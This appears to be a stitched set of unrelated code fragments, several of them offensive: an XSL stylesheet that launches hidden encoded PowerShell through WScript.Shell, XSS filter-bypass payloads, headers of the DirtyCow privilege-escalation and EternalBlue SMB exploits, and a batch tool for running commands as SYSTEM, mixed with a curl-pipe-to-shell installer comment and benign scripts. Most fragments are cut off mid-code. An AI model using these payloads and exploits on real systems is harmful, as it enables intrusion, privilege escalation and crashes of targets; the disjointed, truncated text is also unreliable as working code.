```sh
#!/bin/sh
#
# This script should be run via curl:
#   sh -c "$(curl -fsSL https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"
# or wget:
#   sh -c "$(wget -qO- https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"
#
# As an alternative, you can first download the install script and run it afterwards:
#   wget https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh
#   sh install.sh
```
```xml
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -enc
```
```javascript
var a = document.getElementById('rcnt').innerHTML.match(/<a href=\"(.*?)\" ping/g);
for (var i=0;i<a.length;i++)
{
    var method = a[i].match(/"(.*?):\/\//g)[0];
    var domain = a[i].split("/")[2];
    var result = method+domain;
    console.log(result.substr(1));
}
```
```sh
wget --save-cookies cookies.txt --keep-session-cookies http://my-site.dev/app_dev.php/my/page
# It's possible to add the option "--post-data 'user=foo&password=bar'" if you need to
# log in, for example
# Then retrieve the session ID from cookies.txt
vendor/h4cc/wkhtmltopdf-amd64/bin/wkhtmltopdf-amd64 \
--cookie 'sessionid' 'gfou6ks1lsguuvtk9il2v169n7' \
--cookie 'PHPSESSID' 'gfou6ks1lsguuvtk9il2v169n7' \
--debug-javascript \
```
```javascript
(new Array).filter.constructor('alert(1)')()
[].constructor.constructor('alert(1)')()
[]['constructor']['constructor']('alert(1)')()
[][x='constructor'][x]('alert(1)')()
[][ㅤ='constructor'][ㅤ]('alert(1)')()
```
```c
/*
 * A PTRACE_POKEDATA variant of CVE-2016-5195
 * should work on RHEL 5 & 6
 *
 * (un)comment correct payload (x86 or x64)!
 * $ gcc -pthread c0w.c -o c0w
 * $ ./c0w
 * DirtyCow root privilege escalation
 * Backing up /usr/bin/passwd.. to /tmp/bak
 * mmap fa65a000
```
```bat
@echo off
ver|findstr "5\.[0-9]\.[0-9][0-9]*" >NUL 2>NUL && (echo [-] Not Working for winxp\win2k3 &&goto :EOF)
del /f /q %result_file% >NUL 2>NUL
Rd "%WinDir%\system32\test_permissions" >NUL 2>NUL
Md "%WinDir%\System32\test_permissions" 2>NUL||(Echo.& Echo [-] Run as administrator user. &&goto :EOF)
set comands=%*
if not defined comands (
echo.
echo Run as SYSTEM Account Tool
```
```python
#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depending on what is overwritten)
```